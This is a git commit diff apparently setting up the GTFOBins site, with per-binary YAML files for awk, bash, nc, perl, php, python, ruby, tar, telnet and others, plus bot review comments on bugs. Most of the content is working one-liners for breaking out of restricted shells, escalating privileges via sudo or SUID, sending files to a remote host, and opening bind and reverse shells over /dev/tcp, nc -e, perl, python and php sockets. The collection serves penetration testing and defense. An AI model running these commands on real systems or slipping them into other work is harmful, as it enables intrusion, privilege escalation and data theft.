First commit
commit
b81e57005a
@ -0,0 +1,3 @@
|
|||
/_tmp/
|
||||
/.sass-cache/
|
||||
/_site/
|
|
@ -0,0 +1,3 @@
|
|||
# Contributing
|
||||
|
||||
TODO link to website URL
|
|
@ -0,0 +1,63 @@
|
|||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
addressable (2.5.2)
|
||||
public_suffix (>= 2.0.2, < 4.0)
|
||||
colorator (1.1.0)
|
||||
concurrent-ruby (1.0.5)
|
||||
em-websocket (0.5.1)
|
||||
eventmachine (>= 0.12.9)
|
||||
http_parser.rb (~> 0.6.0)
|
||||
eventmachine (1.2.7)
|
||||
ffi (1.9.23)
|
||||
forwardable-extended (2.6.0)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jekyll (3.8.1)
|
||||
addressable (~> 2.4)
|
||||
colorator (~> 1.0)
|
||||
em-websocket (~> 0.5)
|
||||
i18n (~> 0.7)
|
||||
jekyll-sass-converter (~> 1.0)
|
||||
jekyll-watch (~> 2.0)
|
||||
kramdown (~> 1.14)
|
||||
liquid (~> 4.0)
|
||||
mercenary (~> 0.3.3)
|
||||
pathutil (~> 0.9)
|
||||
rouge (>= 1.7, < 4)
|
||||
safe_yaml (~> 1.0)
|
||||
jekyll-sass-converter (1.5.2)
|
||||
sass (~> 3.4)
|
||||
jekyll-watch (2.0.0)
|
||||
listen (~> 3.0)
|
||||
kramdown (1.16.2)
|
||||
liquid (4.0.0)
|
||||
listen (3.1.5)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
ruby_dep (~> 1.2)
|
||||
mercenary (0.3.6)
|
||||
pathutil (0.16.1)
|
||||
forwardable-extended (~> 2.6)
|
||||
public_suffix (3.0.2)
|
||||
rb-fsevent (0.10.3)
|
||||
rb-inotify (0.9.10)
|
||||
ffi (>= 0.5.0, < 2)
|
||||
rouge (3.1.1)
|
||||
ruby_dep (1.5.0)
|
||||
safe_yaml (1.0.4)
|
||||
sass (3.5.6)
|
||||
sass-listen (~> 4.0.0)
|
||||
sass-listen (4.0.0)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
||||
DEPENDENCIES
|
||||
jekyll
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.1
|
|
@ -0,0 +1,10 @@
|
|||
.PHONY: serve bundle
|
||||
|
||||
serve:
|
||||
bundle exec jekyll serve
|
||||
|
||||
serve-public:
|
||||
bundle exec jekyll serve --host 0.0.0.0
|
||||
|
||||
bundle:
|
||||
bundle install
|
|
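Review bot: `serve-public` is missing from the `.PHONY` line, so a file or directory named `serve-public` in the repository root would make `make serve-public` report nothing to do; the line should be `.PHONY: serve serve-public bundle`. The public target binds the Jekyll dev server to `0.0.0.0`, i.e. every interface, which is presumably the point of the target but deserves a comment above it such as `# listens on all interfaces, intended for LAN testing only`.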
@ -0,0 +1,15 @@
|
|||
title: GTFOBins
|
||||
|
||||
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
|
||||
|
||||
permalink: pretty
|
||||
|
||||
collections:
|
||||
gtfobins:
|
||||
output: true
|
||||
|
||||
defaults:
|
||||
- scope:
|
||||
path: '_gtfobins'
|
||||
values:
|
||||
layout: bin
|
|
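Review bot: The front-matter default is scoped by `path: '_gtfobins'`, which ties the `layout: bin` rule to the directory name; Jekyll also accepts `type: gtfobins` in a defaults scope, which follows the collection itself if the folder is ever renamed, so `scope:` / `type: gtfobins` expresses the intent more directly. The `exclude` list is a one-line flow sequence, fine for four entries but worth moving to block style before it grows.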
@ -0,0 +1,39 @@
|
|||
exec-interactive:
|
||||
label: Interactive
|
||||
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
exec-non-interactive:
|
||||
label: Non-interactive
|
||||
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
suid-enabled:
|
||||
label: SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor.
|
||||
|
||||
suid-limited:
|
||||
label: Limited SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux.
|
||||
|
||||
sudo-enabled:
|
||||
label: Sudo
|
||||
description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`.
|
||||
|
||||
download:
|
||||
label: Download
|
||||
description: It can download remote files.
|
||||
|
||||
upload:
|
||||
label: Upload
|
||||
description: It can exfiltrate files on the network.
|
||||
|
||||
bind-shell:
|
||||
label: Bind shell
|
||||
description: It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
reverse-shell:
|
||||
label: Reverse shell
|
||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
|
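Review bot: The `suid-limited` description contains a typo and a missing possessive (`tipically`, `the default operating systems system shell`); the line should end `Its functioning depends on the default operating system's shell and typically works only on Debian Linux.` The two `suid-*` descriptions are long single-line plain scalars; a `>-` folded block scalar would keep them under any line-length limit without changing the value.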
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
---
|
|
@ -0,0 +1,40 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: bash
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
suid-enabled:
|
||||
- code: ./bash -p
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
|
||||
- description: Send local file using a TCP connection.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
cat $LFILE > /dev/tcp/$RHOST/$RPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
|
||||
- description: Fetch remote file using a TCP connection.
|
||||
code: |-
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
|
||||
---
|
|
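Review bot: The example under `Fetch remote file using a TCP connection.` (the `bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE` line) does not fetch a file: it starts an interactive `bash` whose stdin is the socket, so whatever the remote end sends is executed and only bash's stdout lands in `$LFILE`. If a plain transfer is intended, the mirror of the upload example above it, `cat < /dev/tcp/$RHOST/$RPORT > "$LFILE"`, matches the description; otherwise the example belongs under `reverse-shell`. Separately, the `reverse-shell` example uses `RHOST=127.0.0.1` while the rest of the file uses `10.0.0.1`; a single placeholder keeps the file consistent.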
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: csh
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
suid-enabled:
|
||||
- code: ./csh -b
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request.
|
||||
code: |
|
||||
URL=http://10.0.0.1/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
curl $URL -o $LFILE
|
||||
---
|
|
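Review bot: The upload example references `$file_to_send`, which is never set; the variable defined two lines above is `LFILE`, so `-d @$file_to_send` expands to `-d @` and curl has no file to read. It should read `curl -X POST -d @$LFILE $URL`. Note that `-d @file` strips newlines from the file content; `--data-binary @$LFILE` is the faithful form if arbitrary files are meant.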
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./ed
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: env /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./env /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
---
|
|
@ -0,0 +1,23 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
---
|
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ionice /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ionice /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,10 @@
|
|||
---
|
||||
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,18 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./less /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./man man
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
TERM= ./more /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
|
@ -0,0 +1,25 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Serve a file on a TCP port.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port.
|
||||
code: |-
|
||||
LPORT=8000
|
||||
LFILE=file_to_get
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell:
|
||||
- code: |
|
||||
LPORT=8000
|
||||
nc -lp $LPORT -e /bin/sh
|
||||
---
|
|
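Review bot: The two descriptions do not match their commands: `Serve a file on a TCP port.` sits above `nc $RHOST $RPORT < "$LFILE"`, which connects out to a remote listener and pushes the file, and `Fetch remote file from a remote TCP port.` sits above `nc -l -p $LPORT > "$LFILE"`, which listens locally and waits for the remote side to send. Wording such as `Send a local file to a remote TCP listener.` and `Receive a file on a local TCP port.` describes what the code does. The `-e` option used by the shell examples exists only in some netcat builds (not OpenBSD nc), which under the CONTRIBUTING rules is a limitation that belongs in a `description` field.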
@ -0,0 +1,14 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=12346
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
---
|
|
@ -0,0 +1,39 @@
|
|||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'system($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'passthru($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'print(shell_exec($_ENV["CMD"]));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
---
|
|
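Review bot: The fourth `exec-non-interactive` example is not valid PHP as written: inside the single-quoted shell argument `\"` and `\\n` reach the interpreter literally, so `join(\"\\n\",$r)` is a parse error; within single shell quotes the plain form `print(join("\n",$r));` is what PHP needs. All examples in the file read their input from `$_ENV`, which is empty whenever php.ini's `variables_order` omits `E` (the shipped production ini sets `GPCS`); `getenv("CMD")` works regardless of that setting. The `download` and `reverse-shell` examples carry the same `$_ENV` dependency.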
@ -0,0 +1,32 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
python -m SimpleHTTPServer $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
|
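Review bot: `import urllib as u,urllib2 as u2,os.environ as e` in the upload example raises `ImportError: No module named environ`, because `import` binds modules only and `os.environ` is a dict; the download example on the `urlretrieve` line has the same `os.environ as e` import. The python3 file already uses the working form, which should be mirrored here: `python -c 'import urllib as u,urllib2 as u2;from os import environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'`. The reverse-shell example uses `os.getenv` and is unaffected.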
@ -0,0 +1,32 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LPORT=8888
|
||||
python3 -m http.server $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
|
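Review bot: `u.urlretrieve (e["URL"], e["LFILE"])` in the download example has a stray space before the parenthesis, and the upload example wraps the result of `.encode()` in `bytes(...)`, which only copies bytes into bytes; `u.urlencode({"d":open(e["LFILE"]).read()}).encode()` alone is the argument `urlopen` wants. The upload also opens the file in text mode, so a file that is not valid UTF-8 raises `UnicodeDecodeError` before anything is sent — presumably text payloads are assumed; if not, open with `"rb"` and let `urlencode` quote the bytes.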
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
|
@ -0,0 +1,19 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=10.0.0.1
|
||||
export RPORT=8000
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
load-library:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
---
|
|
@ -0,0 +1,36 @@
|
|||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
./scp -S $TF a b:
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/where_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/file_to_get
|
||||
LFILE=where_to_save
|
||||
scp $RPATH $LFILE
|
||||
---
|
|
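Review bot: The upload example sets `LPATH=file_to_send` but then runs `scp $LFILE $RPATH`, so `$LFILE` is empty and the command degenerates to `scp user@10.0.0.1:~/where_to_save`, a copy into the current directory. Either the assignment or the use has to change; since the download example below already uses `LFILE`, `LFILE=file_to_send` keeps the two consistent.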
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
sudo-enabled:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
---
|
|
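Review bot: The `sudo-enabled` example is identical to the `exec-interactive` one, `setarch $(arch) /bin/sh`, so it never invokes `sudo` and does not demonstrate the privileged case; every other file prefixes the sudo example, so this should be `- code: sudo setarch $(arch) /bin/sh`.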
@ -0,0 +1,20 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost /bin/bash --noprofile --norc
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=file_to_get
|
||||
LPATH=where_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=where_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
---
|
|
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,10 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
|
||||
-p"
|
||||
---
|
|
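Review bot: The `suid-limited` example is a plain scalar that continues on a second line (`-p"`), so the value is only correct because YAML folds that line break into a space; read on its own the source looks as if the string contains a newline, which `exec=` would treat as a command separator. Putting the command on one line, `- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"`, removes the dependency on folding and matches the other two examples.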
@ -0,0 +1,9 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
---
|
|
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
---
|
|
@ -0,0 +1,34 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
suid-limited:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
./telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
---
|
|
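Review bot: The `RHOST=www.google.com` placeholder in the three `telnet` examples names a real third-party host, unlike the `10.0.0.1` address used by every other example in the repository, so following the example as written opens connections to Google. `RHOST=10.0.0.1` with a listener the reader controls keeps the example self-contained. The `description: MacOS only.` keys are placed after `code`, which is valid YAML but reversed relative to the other files, where `description` comes first.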
@ -0,0 +1,15 @@
|
|||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
---
|
|
@ -0,0 +1,13 @@
|
|||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
